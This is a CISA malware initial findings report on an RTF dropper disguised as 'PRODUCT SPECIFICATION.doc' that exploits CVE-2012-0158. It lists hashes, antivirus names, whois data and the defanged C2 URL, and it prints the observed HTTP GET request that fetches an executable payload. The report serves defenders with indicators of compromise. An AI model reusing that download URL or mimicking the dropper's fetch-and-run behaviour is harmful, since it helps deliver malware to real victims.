Analysis Report

MIFR-10056799-1.v2

Last Revised
Alert Code
AR20-133L
 

Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary

Description

This report contains information obtained from automated analysis and is not intended to be a complete description of the submitted sample. Results may be limited due to the complexity of the samples, or due to the ability of the samples to defend against automated analysis techniques. If additional information is required, please contact the Cybersecurity and Infrastructure Security Agency (CISA) using the information provided at the end of this report.

Submission included one malicious RTF file. The primary purpose of this file is to download and install a malicious payload on the infected system.



This report contains preliminary analysis and is not intended to be a complete description of the submitted artifacts' capabilities. Results may be incomplete due to the artifacts' complexity or ability to defend against analysis techniques. If additional information is required, please contact the US-CERT Security Operations Center using the information at the end of this report.



Analysis Environment: 32_bit, windows_7

For a downloadable copy of IOCs, see MIFR-10056799-1.v2.stix.

Files (1)

96d217fc287e7ef0af46449eba405e4b49217834d6335a48b85519b75942c74c (PRODUCT SPECIFICATION.doc)

Domains (1)

marianvanherp.nl

Findings

96d217fc287e7ef0af46449eba405e4b49217834d6335a48b85519b75942c74c

Tags

CVE-2012-0158droppertrojan

Details
Name PRODUCT SPECIFICATION.doc
Size 1051884 bytes
Type Rich Text Format data, version 1, unknown character set
MD5 803825fe1cb0f75d74cbf902c85fb42e
SHA1 7f6d24bf03fc7d466e6300536169f6a103800756
SHA256 96d217fc287e7ef0af46449eba405e4b49217834d6335a48b85519b75942c74c
SHA512 37b254b509263ceabc925ad18da72c878e97fc6ba87f6b8b2c68d9f28cb2581d974c592f909605a57d9795f041f05b20f2488f5fa92ef1a688118aba6d8e7ca4
ssdeep 6144:qzgtSVS0sxCaDWW1acHoUu+zNTMEEfgJ3QIxjN8MoBCdvbWg8eg0z/codDz5bEY4:e+ZCKWlj
Entropy 2.956950
Antivirus
Ahnlab RTF/Dropper
Antiy Trojan[Exploit]/Office.CVE-2012-0158.h
BitDefender Exploit.RTF-ObfsStrm.Gen
ESET Win32/Exploit.CVE-2012-0158.AC trojan
Emsisoft Exploit.RTF-ObfsStrm.Gen (B)
Ikarus Exploit.Win32.CVE-2012-0158
McAfee Exploit-CVE2012-0158.n
Microsoft Security Essentials Exploit:Win32/CVE-2012-0158
NANOAV Exploit.Rtf.Heuristic-rtf.dinbqn
Quick Heal Exp.RTF.CVE-2012-2539
Sophos Troj/DocDrop-DT
Symantec Trojan.Mdropper
TACHYON Exploit.RTF-ObfsStrm.Gen
TrendMicro TROJ_CV.511E971F
TrendMicro House Call TROJ_CV.511E971F
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships
96d217fc28... Connected_To marianvanherp.nl
Description

PRODUCT SPECIFICATION.doc is a malicious RTF file designed to download and install a malicious payload on the victim system. Once the RTF document is opened, the document attempts to download and install a malicious payload from a C2 server using the following URI:



--Begin URI--

hxxp://marianvanherp.nl/libraries/joomla/crypt/.new/austin2.exe

--End URI--





The following is a sample HTTP GET request observed during analysis:



--Begin GET request--

GET /libraries/joomla/crypt/.new/austin2.exe HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C; .NET4.0E)

Host: marianvanherp.nl

Connection: Keep-Alive

--End GET request--





Based on static analysis, it appears that the document attempts to download the payload into %Current Directory%\pong.exe before it is executed. The file the document attempted to download was not available for download at the time of analysis.

marianvanherp.nl

Tags

command-and-control

URLs
  • hxxp://marianvanherp.nl/libraries/joomla/crypt/.new/austin2.exe
HTTP Sessions
  • GET /libraries/joomla/crypt/.new/austin2.exe HTTP/1.1

    Accept: */*

    Accept-Encoding: gzip, deflate

    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C; .NET4.0E)

    Host: marianvanherp.nl

    Connection: Keep-Alive
Whois

Domain name: marianvanherp.nl

Status:     active

Reseller:

Hostingtime

Spieringwater 5

2993DM Barendrecht

Netherlands



Registrar:

Mijn InternetOplossing B.V.

Markerkant 13 18

1314AN ALMERE

Netherlands



DNSSEC:     no



Domain nameservers:

ns1.hostingtime.eu

ns2.hostingtime.eu



Record maintained by: NL Domain Registry

inetnum:        185.69.232.0 - 185.69.235.255

netname:        NL-SPANGOINTERNET-20140912

descr:         Spango Internet B.V.

org:            ORG-SIB86-RIPE

country:        NL

admin-c:        TF3211-RIPE

tech-c:         TF3211-RIPE

mnt-lower:     SPANGO-MNT

mnt-routes:     SPANGO-MNT

mnt-by:         RIPE-NCC-HM-MNT

status:         ALLOCATED PA

created:        2014-09-12T09:59:53Z

last-modified: 2016-04-14T08:30:39Z

source:         RIPE



organisation: ORG-SIB86-RIPE

org-name:     Spango Internet B.V.

org-type:     LIR

address:        Koningsbeltweg 78

address:        1329 AK

address:        Almere

address:        NETHERLANDS

phone:         +31854014710

e-mail:         info@spango.com

abuse-c:        AC28594-RIPE

mnt-ref:        SPANGO-MNT

mnt-ref:        RIPE-NCC-HM-MNT

mnt-by:         RIPE-NCC-HM-MNT

abuse-mailbox: admin@spango.com

created:        2014-09-09T07:52:49Z

last-modified: 2016-02-15T15:50:28Z

source:         RIPE



person:         T Fox

address:        Spango Internet BV

address:        Koningsbeltweg 78, 1329AK, Almere, The Netherlands

phone:         +31854014710

nic-hdl:        TF3211-RIPE

mnt-by:         SPANGO-MNT

created:        2014-09-10T15:19:46Z

last-modified: 2014-09-10T15:22:46Z

source:         RIPE



% Information related to '185.69.232.0/22AS48635'



route:         185.69.232.0/22

descr:         Spango IPv4 Route

origin:         AS48635

mnt-by:         SPANGO-MNT

created:        2015-08-13T19:49:30Z

last-modified: 2015-08-13T19:49:30Z

source:         RIPE

Relationships
marianvanherp.nl Connected_From 96d217fc287e7ef0af46449eba405e4b49217834d6335a48b85519b75942c74c

Relationship Summary

96d217fc28... Connected_To marianvanherp.nl
marianvanherp.nl Connected_From 96d217fc287e7ef0af46449eba405e4b49217834d6335a48b85519b75942c74c

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or soc@us-cert.gov.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.us-cert.gov.

Revisions

May 12, 2020: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.